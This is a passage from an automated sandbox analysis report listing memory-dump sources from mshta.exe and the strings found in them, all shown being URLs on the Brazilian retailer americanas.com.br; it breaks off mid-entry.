Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensa
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401062587.000000000AB51000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463326709.000000000AB55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487271254.000000000AB59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380864273.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377966306.000000000AB45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404256581.000000000AB51000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384779878.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460957598.000000000AC7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464533482.000000000AC80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento?chave=dk_hm_ft_00_01_atendimento
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB73000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_entrega?chave=dk_hm_ft_00_04_entrega
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384779878.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487488162.000000000AB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_trocasedevolucoes?chave=dk_hm_ft_00_02_trocas
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-beleza?chave=dk_hm_bn_5_5_beleza-drop-down__Link-sc-25d
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-cameba?chave=dk_hm_bn_5_4_cameba6gr
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404882839.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485566366.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-esporte?chave=dk_hm_bn_5_1_esporte
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-games?chave=dk_hm_bn_5_6_consolesb
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-suplementos?chave=dk_hm_bn_5_8_suplementos
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/campanha-brinquedos?chave=dk_hm_dt_2_8_brinquedos
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=dk_hm_ats_2_6_cuponeriahbq
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466221929.000000000AC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupom
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404755230.000000000AB34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/cuponeria?chave=dk_hm_ft_00_07_cuponeria
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402274224.000000000ABFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410331977.000000000ABFC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488051820.000000000ABFC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317838412.00000000067E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-automotivo?chave=
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-clima?chave=
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403823205.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462978019.000000000B696000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460847777.000000000B657000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489928071.000000000B699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484783384.0000000009508000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-evento-brinq-esporte?chave=dk_hm_dt_2_9_brinquesporte
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 